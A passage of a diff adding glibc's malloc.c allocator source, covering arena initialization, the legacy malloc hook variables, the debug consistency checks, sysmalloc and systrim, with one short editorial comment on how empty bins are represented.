+  .trim_threshold = DEFAULT_TRIM_THRESHOLD,
+#define NARENAS_FROM_NCORES(n) ((n) * (sizeof (long) == 4 ? 2 : 8))
+  .arena_test = NARENAS_FROM_NCORES (1)
+#if USE_TCACHE
+  ,
+  .tcache_count = TCACHE_FILL_COUNT,
+  .tcache_bins = TCACHE_MAX_BINS,
+  .tcache_max_bytes = tidx2usize (TCACHE_MAX_BINS-1),
+  .tcache_unsorted_limit = 0 /* No limit.  */
+#endif
+};
+
+/*
+   Initialize a malloc_state struct.
+
+   This is called from ptmalloc_init () or from _int_new_arena ()
+   when creating a new arena.
+ */
+
+static void
+malloc_init_state (mstate av)
+{
+  int i;
+  mbinptr bin;
+
+  /* Establish circular links for normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      bin = bin_at (av, i);
+      bin->fd = bin->bk = bin;
+    }
+
+#if MORECORE_CONTIGUOUS
+  if (av != &main_arena)
+#endif
+  set_noncontiguous (av);
+  if (av == &main_arena)
+    set_max_fast (DEFAULT_MXFAST);
+  atomic_store_relaxed (&av->have_fastchunks, false);
+
+  av->top = initial_top (av);
+}
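+
+/* Editorial note (not part of glibc): after this initialization every
+   normal bin is an empty circular list whose pseudo-chunk points at
+   itself, i.e. first (b) == last (b) == b; that self-reference is the
+   emptiness test used by do_check_malloc_state() further below.  */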
+
+/*
+   Other internal utilities operating on mstates
+ */
+
+static void *sysmalloc (INTERNAL_SIZE_T, mstate);
+static int      systrim (size_t, mstate);
+static void     malloc_consolidate (mstate);
+
+
+/* -------------- Early definitions for debugging hooks ---------------- */
+
+/* Define and initialize the hook variables.  These weak definitions must
+   appear before any use of the variables in a function (arena.c uses one).  */
+#ifndef weak_variable
+/* In GNU libc we want the hook variables to be weak definitions to
+   avoid a problem with Emacs.  */
+# define weak_variable weak_function
+#endif
+
+/* Forward declarations.  */
+static void *malloc_hook_ini (size_t sz,
+                              const void *caller) __THROW;
+static void *realloc_hook_ini (void *ptr, size_t sz,
+                               const void *caller) __THROW;
+static void *memalign_hook_ini (size_t alignment, size_t sz,
+                                const void *caller) __THROW;
+
+#if HAVE_MALLOC_INIT_HOOK
+void weak_variable (*__malloc_initialize_hook) (void) = NULL;
+compat_symbol (libc, __malloc_initialize_hook,
+	       __malloc_initialize_hook, GLIBC_2_0);
+#endif
+
+void weak_variable (*__free_hook) (void *__ptr,
+                                   const void *) = NULL;
+void *weak_variable (*__malloc_hook)
+  (size_t __size, const void *) = malloc_hook_ini;
+void *weak_variable (*__realloc_hook)
+  (void *__ptr, size_t __size, const void *)
+  = realloc_hook_ini;
+void *weak_variable (*__memalign_hook)
+  (size_t __alignment, size_t __size, const void *)
+  = memalign_hook_ini;
+void weak_variable (*__after_morecore_hook) (void) = NULL;
+
+/* This function is called from the arena shutdown hook, to free the
+   thread cache (if it exists).  */
+static void tcache_thread_shutdown (void);
+
+/* ------------------ Testing support ----------------------------------*/
+
+static int perturb_byte;
+
+static void
+alloc_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte ^ 0xff, n);
+}
+
+static void
+free_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte, n);
+}
+
+
+
+#include <stap-probe.h>
+
+/* ------------------- Support for multiple arenas -------------------- */
+#include "arena.c"
+
+/*
+   Debugging support
+
+   These routines make a number of assertions about the states
+   of data structures that should be true at all times. If any
+   are not true, it's very likely that a user program has somehow
+   trashed memory. (It's also possible that there is a coding error
+   in malloc. In which case, please report it!)
+ */
+
+#if !MALLOC_DEBUG
+
+# define check_chunk(A, P)
+# define check_free_chunk(A, P)
+# define check_inuse_chunk(A, P)
+# define check_remalloced_chunk(A, P, N)
+# define check_malloced_chunk(A, P, N)
+# define check_malloc_state(A)
+
+#else
+
+# define check_chunk(A, P)              do_check_chunk (A, P)
+# define check_free_chunk(A, P)         do_check_free_chunk (A, P)
+# define check_inuse_chunk(A, P)        do_check_inuse_chunk (A, P)
+# define check_remalloced_chunk(A, P, N) do_check_remalloced_chunk (A, P, N)
+# define check_malloced_chunk(A, P, N)   do_check_malloced_chunk (A, P, N)
+# define check_malloc_state(A)         do_check_malloc_state (A)
+
+/*
+   Properties of all chunks
+ */
+
+static void
+do_check_chunk (mstate av, mchunkptr p)
+{
+  unsigned long sz = chunksize (p);
+  /* min and max possible addresses assuming contiguous allocation */
+  char *max_address = (char *) (av->top) + chunksize (av->top);
+  char *min_address = max_address - av->system_mem;
+
+  if (!chunk_is_mmapped (p))
+    {
+      /* Has legal address ... */
+      if (p != av->top)
+        {
+          if (contiguous (av))
+            {
+              assert (((char *) p) >= min_address);
+              assert (((char *) p + sz) <= ((char *) (av->top)));
+            }
+        }
+      else
+        {
+          /* top size is always at least MINSIZE */
+          assert ((unsigned long) (sz) >= MINSIZE);
+          /* top predecessor always marked inuse */
+          assert (prev_inuse (p));
+        }
+    }
+  else if (!DUMPED_MAIN_ARENA_CHUNK (p))
+    {
+      /* address is outside main heap  */
+      if (contiguous (av) && av->top != initial_top (av))
+        {
+          assert (((char *) p) < min_address || ((char *) p) >= max_address);
+        }
+      /* chunk is page-aligned */
+      assert (((prev_size (p) + sz) & (GLRO (dl_pagesize) - 1)) == 0);
+      /* mem is aligned */
+      assert (aligned_OK (chunk2mem (p)));
+    }
+}
+
+/*
+   Properties of free chunks
+ */
+
+static void
+do_check_free_chunk (mstate av, mchunkptr p)
+{
+  INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);
+  mchunkptr next = chunk_at_offset (p, sz);
+
+  do_check_chunk (av, p);
+
+  /* Chunk must claim to be free ... */
+  assert (!inuse (p));
+  assert (!chunk_is_mmapped (p));
+
+  /* Unless a special marker, must have OK fields */
+  if ((unsigned long) (sz) >= MINSIZE)
+    {
+      assert ((sz & MALLOC_ALIGN_MASK) == 0);
+      assert (aligned_OK (chunk2mem (p)));
+      /* ... matching footer field */
+      assert (prev_size (next_chunk (p)) == sz);
+      /* ... and is fully consolidated */
+      assert (prev_inuse (p));
+      assert (next == av->top || inuse (next));
+
+      /* ... and has minimally sane links */
+      assert (p->fd->bk == p);
+      assert (p->bk->fd == p);
+    }
+  else /* markers are always of size SIZE_SZ */
+    assert (sz == SIZE_SZ);
+}
+
+/*
+   Properties of inuse chunks
+ */
+
+static void
+do_check_inuse_chunk (mstate av, mchunkptr p)
+{
+  mchunkptr next;
+
+  do_check_chunk (av, p);
+
+  if (chunk_is_mmapped (p))
+    return; /* mmapped chunks have no next/prev */
+
+  /* Check whether it claims to be in use ... */
+  assert (inuse (p));
+
+  next = next_chunk (p);
+
+  /* ... and is surrounded by OK chunks.
+     Since more things can be checked with free chunks than inuse ones,
+     if an inuse chunk borders them and debug is on, it's worth doing them.
+   */
+  if (!prev_inuse (p))
+    {
+      /* Note that we cannot even look at prev unless it is not inuse */
+      mchunkptr prv = prev_chunk (p);
+      assert (next_chunk (prv) == p);
+      do_check_free_chunk (av, prv);
+    }
+
+  if (next == av->top)
+    {
+      assert (prev_inuse (next));
+      assert (chunksize (next) >= MINSIZE);
+    }
+  else if (!inuse (next))
+    do_check_free_chunk (av, next);
+}
+
+/*
+   Properties of chunks recycled from fastbins
+ */
+
+static void
+do_check_remalloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);
+
+  if (!chunk_is_mmapped (p))
+    {
+      assert (av == arena_for_chunk (p));
+      if (chunk_main_arena (p))
+        assert (av == &main_arena);
+      else
+        assert (av != &main_arena);
+    }
+
+  do_check_inuse_chunk (av, p);
+
+  /* Legal size ... */
+  assert ((sz & MALLOC_ALIGN_MASK) == 0);
+  assert ((unsigned long) (sz) >= MINSIZE);
+  /* ... and alignment */
+  assert (aligned_OK (chunk2mem (p)));
+  /* chunk is less than MINSIZE more than request */
+  assert ((long) (sz) - (long) (s) >= 0);
+  assert ((long) (sz) - (long) (s + MINSIZE) < 0);
+}
+
+/*
+   Properties of nonrecycled chunks at the point they are malloced
+ */
+
+static void
+do_check_malloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  /* same as recycled case ... */
+  do_check_remalloced_chunk (av, p, s);
+
+  /*
+     ... plus,  must obey implementation invariant that prev_inuse is
+     always true of any allocated chunk; i.e., that each allocated
+     chunk borders either a previously allocated and still in-use
+     chunk, or the base of its memory arena. This is ensured
+     by making all allocations from the `lowest' part of any found
+     chunk.  This does not necessarily hold however for chunks
+     recycled via fastbins.
+   */
+
+  assert (prev_inuse (p));
+}
+
+
+/*
+   Properties of malloc_state.
+
+   This may be useful for debugging malloc, as well as detecting user
+   programmer errors that somehow write into malloc_state.
+
+   If you are extending or experimenting with this malloc, you can
+   probably figure out how to hack this routine to print out or
+   display chunk addresses, sizes, bins, and other instrumentation.
+ */
+
+static void
+do_check_malloc_state (mstate av)
+{
+  int i;
+  mchunkptr p;
+  mchunkptr q;
+  mbinptr b;
+  unsigned int idx;
+  INTERNAL_SIZE_T size;
+  unsigned long total = 0;
+  int max_fast_bin;
+
+  /* internal size_t must be no wider than pointer type */
+  assert (sizeof (INTERNAL_SIZE_T) <= sizeof (char *));
+
+  /* alignment is a power of 2 */
+  assert ((MALLOC_ALIGNMENT & (MALLOC_ALIGNMENT - 1)) == 0);
+
+  /* Check the arena is initialized. */
+  assert (av->top != 0);
+
+  /* No memory has been allocated yet, so doing more tests is not possible.  */
+  if (av->top == initial_top (av))
+    return;
+
+  /* pagesize is a power of 2 */
+  assert (powerof2(GLRO (dl_pagesize)));
+
+  /* A contiguous main_arena is consistent with sbrk_base.  */
+  if (av == &main_arena && contiguous (av))
+    assert ((char *) mp_.sbrk_base + av->system_mem ==
+            (char *) av->top + chunksize (av->top));
+
+  /* properties of fastbins */
+
+  /* max_fast is in allowed range */
+  assert ((get_max_fast () & ~1) <= request2size (MAX_FAST_SIZE));
+
+  max_fast_bin = fastbin_index (get_max_fast ());
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      p = fastbin (av, i);
+
+      /* The following test can only be performed for the main arena.
+         While mallopt calls malloc_consolidate to get rid of all fast
+         bins (especially those larger than the new maximum) this does
+         only happen for the main arena.  Trying to do this for any
+         other arena would mean those arenas have to be locked and
+         malloc_consolidate be called for them.  This is excessive.  And
+         even if this is acceptable to somebody it still cannot solve
+         the problem completely since if the arena is locked a
+         concurrent malloc call might create a new arena which then
+         could use the newly invalid fast bins.  */
+
+      /* all bins past max_fast are empty */
+      if (av == &main_arena && i > max_fast_bin)
+        assert (p == 0);
+
+      while (p != 0)
+        {
+          /* each chunk claims to be inuse */
+          do_check_inuse_chunk (av, p);
+          total += chunksize (p);
+          /* chunk belongs in this bin */
+          assert (fastbin_index (chunksize (p)) == i);
+          p = p->fd;
+        }
+    }
+
+  /* check normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+
+      /* binmap is accurate (except for bin 1 == unsorted_chunks) */
+      if (i >= 2)
+        {
+          unsigned int binbit = get_binmap (av, i);
+          int empty = last (b) == b;
+          if (!binbit)
+            assert (empty);
+          else if (!empty)
+            assert (binbit);
+        }
+
+      for (p = last (b); p != b; p = p->bk)
+        {
+          /* each chunk claims to be free */
+          do_check_free_chunk (av, p);
+          size = chunksize (p);
+          total += size;
+          if (i >= 2)
+            {
+              /* chunk belongs in bin */
+              idx = bin_index (size);
+              assert (idx == i);
+              /* lists are sorted */
+              assert (p->bk == b ||
+                      (unsigned long) chunksize (p->bk) >= (unsigned long) chunksize (p));
+
+              if (!in_smallbin_range (size))
+                {
+                  if (p->fd_nextsize != NULL)
+                    {
+                      if (p->fd_nextsize == p)
+                        assert (p->bk_nextsize == p);
+                      else
+                        {
+                          if (p->fd_nextsize == first (b))
+                            assert (chunksize (p) < chunksize (p->fd_nextsize));
+                          else
+                            assert (chunksize (p) > chunksize (p->fd_nextsize));
+
+                          if (p == first (b))
+                            assert (chunksize (p) > chunksize (p->bk_nextsize));
+                          else
+                            assert (chunksize (p) < chunksize (p->bk_nextsize));
+                        }
+                    }
+                  else
+                    assert (p->bk_nextsize == NULL);
+                }
+            }
+          else if (!in_smallbin_range (size))
+            assert (p->fd_nextsize == NULL && p->bk_nextsize == NULL);
+          /* chunk is followed by a legal chain of inuse chunks */
+          for (q = next_chunk (p);
+               (q != av->top && inuse (q) &&
+                (unsigned long) (chunksize (q)) >= MINSIZE);
+               q = next_chunk (q))
+            do_check_inuse_chunk (av, q);
+        }
+    }
+
+  /* top chunk is OK */
+  check_chunk (av, av->top);
+}
+#endif
+
+
+/* ----------------- Support for debugging hooks -------------------- */
+#include "hooks.c"
+
+
+/* ----------- Routines dealing with system allocation -------------- */
+
+/*
+   sysmalloc handles malloc cases requiring more memory from the system.
+   On entry, it is assumed that av->top does not have enough
+   space to service request for nb bytes, thus requiring that av->top
+   be extended or replaced.
+ */
+
+static void *
+sysmalloc (INTERNAL_SIZE_T nb, mstate av)
+{
+  mchunkptr old_top;              /* incoming value of av->top */
+  INTERNAL_SIZE_T old_size;       /* its size */
+  char *old_end;                  /* its end address */
+
+  long size;                      /* arg to first MORECORE or mmap call */
+  char *brk;                      /* return value from MORECORE */
+
+  long correction;                /* arg to 2nd MORECORE call */
+  char *snd_brk;                  /* 2nd return val */
+
+  INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */
+  INTERNAL_SIZE_T end_misalign;   /* partial page left at end of new space */
+  char *aligned_brk;              /* aligned offset into brk */
+
+  mchunkptr p;                    /* the allocated/returned chunk */
+  mchunkptr remainder;            /* remainder from allocation */
+  unsigned long remainder_size;   /* its size */
+
+
+  size_t pagesize = GLRO (dl_pagesize);
+  bool tried_mmap = false;
+
+
+  /*
+     If have mmap, and the request size meets the mmap threshold, and
+     the system supports mmap, and there are few enough currently
+     allocated mmapped regions, try to directly map this request
+     rather than expanding top.
+   */
+
+  if (av == NULL
+      || ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
+	  && (mp_.n_mmaps < mp_.n_mmaps_max)))
+    {
+      char *mm;           /* return value from mmap call*/
+
+    try_mmap:
+      /*
+         Round up size to nearest page.  For mmapped chunks, the overhead
+         is one SIZE_SZ unit larger than for normal chunks, because there
+         is no following chunk whose prev_size field could be used.
+
+         See the front_misalign handling below; for glibc there is no
+         need for further alignment unless we have high alignment.
+       */
+      if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+        size = ALIGN_UP (nb + SIZE_SZ, pagesize);
+      else
+        size = ALIGN_UP (nb + SIZE_SZ + MALLOC_ALIGN_MASK, pagesize);
+      tried_mmap = true;
+
+      /* Don't try if size wraps around 0 */
+      if ((unsigned long) (size) > (unsigned long) (nb))
+        {
+          mm = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+          if (mm != MAP_FAILED)
+            {
+              /*
+                 The offset to the start of the mmapped region is stored
+                 in the prev_size field of the chunk. This allows us to adjust
+                 returned start address to meet alignment requirements here
+                 and in memalign(), and still be able to compute proper
+                 address argument for later munmap in free() and realloc().
+               */
+
+              if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                {
+                  /* For glibc, chunk2mem increases the address by 2*SIZE_SZ and
+                     MALLOC_ALIGN_MASK is 2*SIZE_SZ-1.  Each mmap'ed area is page
+                     aligned and therefore definitely MALLOC_ALIGN_MASK-aligned.  */
+                  assert (((INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK) == 0);
+                  front_misalign = 0;
+                }
+              else
+                front_misalign = (INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK;
+              if (front_misalign > 0)
+                {
+                  correction = MALLOC_ALIGNMENT - front_misalign;
+                  p = (mchunkptr) (mm + correction);
+		  set_prev_size (p, correction);
+                  set_head (p, (size - correction) | IS_MMAPPED);
+                }
+              else
+                {
+                  p = (mchunkptr) mm;
+		  set_prev_size (p, 0);
+                  set_head (p, size | IS_MMAPPED);
+                }
+
+              /* update statistics */
+
+              int new = atomic_exchange_and_add (&mp_.n_mmaps, 1) + 1;
+              atomic_max (&mp_.max_n_mmaps, new);
+
+              unsigned long sum;
+              sum = atomic_exchange_and_add (&mp_.mmapped_mem, size) + size;
+              atomic_max (&mp_.max_mmapped_mem, sum);
+
+              check_chunk (av, p);
+
+              return chunk2mem (p);
+            }
+        }
+    }
+
+  /* There are no usable arenas and mmap also failed.  */
+  if (av == NULL)
+    return 0;
+
+  /* Record incoming configuration of top */
+
+  old_top = av->top;
+  old_size = chunksize (old_top);
+  old_end = (char *) (chunk_at_offset (old_top, old_size));
+
+  brk = snd_brk = (char *) (MORECORE_FAILURE);
+
+  /*
+     If not the first time through, we require old_size to be
+     at least MINSIZE and to have prev_inuse set.
+   */
+
+  assert ((old_top == initial_top (av) && old_size == 0) ||
+          ((unsigned long) (old_size) >= MINSIZE &&
+           prev_inuse (old_top) &&
+           ((unsigned long) old_end & (pagesize - 1)) == 0));
+
+  /* Precondition: not enough current space to satisfy nb request */
+  assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));
+
+
+  if (av != &main_arena)
+    {
+      heap_info *old_heap, *heap;
+      size_t old_heap_size;
+
+      /* First try to extend the current heap. */
+      old_heap = heap_for_ptr (old_top);
+      old_heap_size = old_heap->size;
+      if ((long) (MINSIZE + nb - old_size) > 0
+          && grow_heap (old_heap, MINSIZE + nb - old_size) == 0)
+        {
+          av->system_mem += old_heap->size - old_heap_size;
+          set_head (old_top, (((char *) old_heap + old_heap->size) - (char *) old_top)
+                    | PREV_INUSE);
+        }
+      else if ((heap = new_heap (nb + (MINSIZE + sizeof (*heap)), mp_.top_pad)))
+        {
+          /* Use a newly allocated heap.  */
+          heap->ar_ptr = av;
+          heap->prev = old_heap;
+          av->system_mem += heap->size;
+          /* Set up the new top.  */
+          top (av) = chunk_at_offset (heap, sizeof (*heap));
+          set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE);
+
+          /* Setup fencepost and free the old top chunk with a multiple of
+             MALLOC_ALIGNMENT in size. */
+          /* The fencepost takes at least MINSIZE bytes, because it might
+             become the top chunk again later.  Note that a footer is set
+             up, too, although the chunk is marked in use. */
+          old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK;
+          set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ), 0 | PREV_INUSE);
+          if (old_size >= MINSIZE)
+            {
+              set_head (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ));
+              set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA);
+              _int_free (av, old_top, 1);
+            }
+          else
+            {
+              set_head (old_top, (old_size + 2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (old_top, (old_size + 2 * SIZE_SZ));
+            }
+        }
+      else if (!tried_mmap)
+        /* We can at least try to use mmap to map memory.  */
+        goto try_mmap;
+    }
+  else     /* av == main_arena */
+
+
+    { /* Request enough space for nb + pad + overhead */
+      size = nb + mp_.top_pad + MINSIZE;
+
+      /*
+         If contiguous, we can subtract out existing space that we hope to
+         combine with new space. We add it back later only if
+         we don't actually get contiguous space.
+       */
+
+      if (contiguous (av))
+        size -= old_size;
+
+      /*
+         Round to a multiple of page size.
+         If MORECORE is not contiguous, this ensures that we only call it
+         with whole-page arguments.  And if MORECORE is contiguous and
+         this is not first time through, this preserves page-alignment of
+         previous calls. Otherwise, we correct to page-align below.
+       */
+
+      size = ALIGN_UP (size, pagesize);
+
+      /*
+         Don't try to call MORECORE if argument is so big as to appear
+         negative. Note that since mmap takes size_t arg, it may succeed
+         below even if we cannot call MORECORE.
+       */
+
+      if (size > 0)
+        {
+          brk = (char *) (MORECORE (size));
+          LIBC_PROBE (memory_sbrk_more, 2, brk, size);
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          /* Call the `morecore' hook if necessary.  */
+          void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+          if (__builtin_expect (hook != NULL, 0))
+            (*hook)();
+        }
+      else
+        {
+          /*
+             If have mmap, try using it as a backup when MORECORE fails or
+             cannot be used. This is worth doing on systems that have "holes" in
+             address space, so sbrk cannot extend to give contiguous space, but
+             space is available elsewhere.  Note that we ignore mmap max count
+             and threshold limits, since the space will not be used as a
+             segregated mmap region.
+           */
+
+          /* Cannot merge with old top, so add its size back in */
+          if (contiguous (av))
+            size = ALIGN_UP (size + old_size, pagesize);
+
+          /* If we are relying on mmap as backup, then use larger units */
+          if ((unsigned long) (size) < (unsigned long) (MMAP_AS_MORECORE_SIZE))
+            size = MMAP_AS_MORECORE_SIZE;
+
+          /* Don't try if size wraps around 0 */
+          if ((unsigned long) (size) > (unsigned long) (nb))
+            {
+              char *mbrk = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+              if (mbrk != MAP_FAILED)
+                {
+                  /* We do not need, and cannot use, another sbrk call to find end */
+                  brk = mbrk;
+                  snd_brk = brk + size;
+
+                  /*
+                     Record that we no longer have a contiguous sbrk region.
+                     After the first time mmap is used as backup, we do not
+                     ever rely on contiguous space since this could incorrectly
+                     bridge regions.
+                   */
+                  set_noncontiguous (av);
+                }
+            }
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          if (mp_.sbrk_base == 0)
+            mp_.sbrk_base = brk;
+          av->system_mem += size;
+
+          /*
+             If MORECORE extends previous space, we can likewise extend top size.
+           */
+
+          if (brk == old_end && snd_brk == (char *) (MORECORE_FAILURE))
+            set_head (old_top, (size + old_size) | PREV_INUSE);
+
+          else if (contiguous (av) && old_size && brk < old_end)
+	    /* Oops!  Someone else killed our space..  Can't touch anything.  */
+	    malloc_printerr ("break adjusted to free malloc space");
+
+          /*
+             Otherwise, make adjustments:
+
+           * If the first time through or noncontiguous, we need to call sbrk
+              just to find out where the end of memory lies.
+
+           * We need to ensure that all returned chunks from malloc will meet
+              MALLOC_ALIGNMENT
+
+           * If there was an intervening foreign sbrk, we need to adjust sbrk
+              request size to account for fact that we will not be able to
+              combine new space with existing space in old_top.
+
+           * Almost all systems internally allocate whole pages at a time, in
+              which case we might as well use the whole last page of request.
+              So we allocate enough more memory to hit a page boundary now,
+              which in turn causes future contiguous calls to page-align.
+           */
+
+          else
+            {
+              front_misalign = 0;
+              end_misalign = 0;
+              correction = 0;
+              aligned_brk = brk;
+
+              /* handle contiguous cases */
+              if (contiguous (av))
+                {
+                  /* Count foreign sbrk as system_mem.  */
+                  if (old_size)
+                    av->system_mem += brk - old_end;
+
+                  /* Guarantee alignment of first new chunk made from this space */
+
+                  front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                  if (front_misalign > 0)
+                    {
+                      /*
+                         Skip over some bytes to arrive at an aligned position.
+                         We don't need to specially mark these wasted front bytes.
+                         They will never be accessed anyway because
+                         prev_inuse of av->top (and any chunk created from its start)
+                         is always true after initialization.
+                       */
+
+                      correction = MALLOC_ALIGNMENT - front_misalign;
+                      aligned_brk += correction;
+                    }
+
+                  /*
+                     If this isn't adjacent to existing space, then we will not
+                     be able to merge with old_top space, so must add to 2nd request.
+                   */
+
+                  correction += old_size;
+
+                  /* Extend the end address to hit a page boundary */
+                  end_misalign = (INTERNAL_SIZE_T) (brk + size + correction);
+                  correction += (ALIGN_UP (end_misalign, pagesize)) - end_misalign;
+
+                  assert (correction >= 0);
+                  snd_brk = (char *) (MORECORE (correction));
+
+                  /*
+                     If can't allocate correction, try to at least find out current
+                     brk.  It might be enough to proceed without failing.
+
+                     Note that if second sbrk did NOT fail, we assume that space
+                     is contiguous with first sbrk. This is a safe assumption unless
+                     program is multithreaded but doesn't use locks and a foreign sbrk
+                     occurred between our first and second calls.
+                   */
+
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      correction = 0;
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                  else
+                    {
+                      /* Call the `morecore' hook if necessary.  */
+                      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+                      if (__builtin_expect (hook != NULL, 0))
+                        (*hook)();
+                    }
+                }
+
+              /* handle non-contiguous cases */
+              else
+                {
+                  if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                    /* MORECORE/mmap must correctly align */
+                    assert (((unsigned long) chunk2mem (brk) & MALLOC_ALIGN_MASK) == 0);
+                  else
+                    {
+                      front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                      if (front_misalign > 0)
+                        {
+                          /*
+                             Skip over some bytes to arrive at an aligned position.
+                             We don't need to specially mark these wasted front bytes.
+                             They will never be accessed anyway because
+                             prev_inuse of av->top (and any chunk created from its start)
+                             is always true after initialization.
+                           */
+
+                          aligned_brk += MALLOC_ALIGNMENT - front_misalign;
+                        }
+                    }
+
+                  /* Find out current end of memory */
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                }
+
+              /* Adjust top based on results of second sbrk */
+              if (snd_brk != (char *) (MORECORE_FAILURE))
+                {
+                  av->top = (mchunkptr) aligned_brk;
+                  set_head (av->top, (snd_brk - aligned_brk + correction) | PREV_INUSE);
+                  av->system_mem += correction;
+
+                  /*
+                     If not the first time through, we either have a
+                     gap due to foreign sbrk or a non-contiguous region.  Insert a
+                     double fencepost at old_top to prevent consolidation with space
+                     we don't own. These fenceposts are artificial chunks that are
+                     marked as inuse and are in any case too small to use.  We need
+                     two to make sizes and alignments work out.
+                   */
+
+                  if (old_size != 0)
+                    {
+                      /*
+                         Shrink old_top to insert fenceposts, keeping size a
+                         multiple of MALLOC_ALIGNMENT. We know there is at least
+                         enough space in old_top to do this.
+                       */
+                      old_size = (old_size - 4 * SIZE_SZ) & ~MALLOC_ALIGN_MASK;
+                      set_head (old_top, old_size | PREV_INUSE);
+
+                      /*
+                         Note that the following assignments completely overwrite
+                         old_top when old_size was previously MINSIZE.  This is
+                         intentional. We need the fencepost, even if old_top otherwise gets
+                         lost.
+                       */
+		      set_head (chunk_at_offset (old_top, old_size),
+				(2 * SIZE_SZ) | PREV_INUSE);
+		      set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ),
+				(2 * SIZE_SZ) | PREV_INUSE);
+
+                      /* If possible, release the rest. */
+                      if (old_size >= MINSIZE)
+                        {
+                          _int_free (av, old_top, 1);
+                        }
+                    }
+                }
+            }
+        }
+    } /* if (av !=  &main_arena) */
+
+  if ((unsigned long) av->system_mem > (unsigned long) (av->max_system_mem))
+    av->max_system_mem = av->system_mem;
+  check_malloc_state (av);
+
+  /* finally, do the allocation */
+  p = av->top;
+  size = chunksize (p);
+
+  /* check that one of the above allocation paths succeeded */
+  if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+    {
+      remainder_size = size - nb;
+      remainder = chunk_at_offset (p, nb);
+      av->top = remainder;
+      set_head (p, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE);
+      check_malloced_chunk (av, p, nb);
+      return chunk2mem (p);
+    }
+
+  /* catch all failure paths */
+  __set_errno (ENOMEM);
+  return 0;
+}
+
+
+/*
+   systrim is an inverse of sorts to sysmalloc.  It gives memory back
+   to the system (via negative arguments to sbrk) if there is unused
+   memory at the `high' end of the malloc pool. It is called
+   automatically by free() when top space exceeds the trim
+   threshold. It is also called by the public malloc_trim routine.  It
+   returns 1 if it actually released any memory, else 0.
+ */
+
+static int
+systrim (size_t pad, mstate av)
+{
+  long top_size;         /* Amount of top-most memory */
+  long extra;            /* Amount to release */
+  long released;         /* Amount actually released */
+  char *current_brk;     /* address returned by pre-check sbrk call */
+  char *new_brk;         /* address returned by post-check sbrk call */
+  size_t pagesize;
+  long top_area;
+
+  pagesize = GLRO (dl_pagesize);
+  top_size = chunksize (av->top);
+
+  top_area = top_size - MINSIZE - 1;
+  if (top_area <= pad)
+    return 0;
+
+  /* Release in pagesize units and round down to the nearest page.  */
+  extra = ALIGN_DOWN(top_area - pad, pagesize);
+
+  if (extra == 0)
+    return 0;
+
+  /*
+     Only proceed if end of memory is where we last set it.
+     This avoids problems if there were foreign sbrk calls.
+   */
+  current_brk = (char *) (MORECORE (0));
+  if (current_brk == (char *) (av->top) + top_size)
+    {
+      /*
+         Attempt to release memory. We ignore MORECORE return value,
+         and instead call again to find out where new end of memory is.
+         This avoids problems if first call releases less than we asked,
+         or if failure somehow altered the brk value. (We could still
+         encounter problems if it altered brk in some very bad way,
+         but the only thing we can do is adjust anyway, which will cause
+         some downstream failure.)
+       */
+
+      MORECORE (-extra);
+      /* Call the `morecore' hook if necessary.  */
+      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+      if (__builtin_expect (hook != NULL, 0))
+        (*hook)();
+      new_brk = (char *) (MORECORE (0));
+
+      LIBC_PROBE (memory_sbrk_less, 2, new_brk, extra);
+
+      if (new_brk != (char *) MORECORE_FAILURE)
+        {
+          released = (long) (current_brk - new_brk);
+
+          if (released != 0)
+            {
+              /* Success. Adjust top. */
+              av->system_mem -= released;
+              set_head (av->top, (top_size - released) | PREV_INUSE);
+              check_malloc_state (av);
+              return 1;
+            }
+        }
+    }
+  return 0;
+}
+
+static void
+munmap_chunk (mchunkptr p)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T size = chunksize (p);
+
+  assert (chunk_is_mmapped (p));
+
+  /* Do nothing if the chunk is a faked mmapped chunk in the dumped
+     main arena.  We never free this memory.  */
+  if (DUMPED_MAIN_ARENA_CHUNK (p))
+    return;
+
